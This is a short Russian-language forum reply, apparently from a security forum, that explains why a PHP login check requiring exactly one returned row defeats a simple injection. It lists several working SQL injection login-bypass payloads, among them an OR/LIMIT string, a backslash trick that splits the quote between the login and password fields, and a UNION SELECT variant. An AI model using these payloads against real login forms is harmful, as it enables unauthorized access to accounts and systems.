06.05.2011, 22:51
|
|
Новичок
Регистрация: 04.05.2011
Сообщений: 10
Провел на форуме:
3598
Репутация:
10
|
|
Потому что, у тебя проверка
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
Тоесть запрос должен возвращать одну запись
Вариантов тут много:
login: 'or(1)limit 1-- a
password: pew
login: \
password: or(1)limit 1-- a
login: ' union select 1-- a
password: pew
При втором варианте ковычка от логина закроется кавычкой от пасса, и в пасс вписывается злозапрос.
Сообщение от {lIbERT}
' or '1' = '1
Авторизация проходит...
Сообщение от {lIbERT}
в оба.
Вы чему людей учите? |
|
|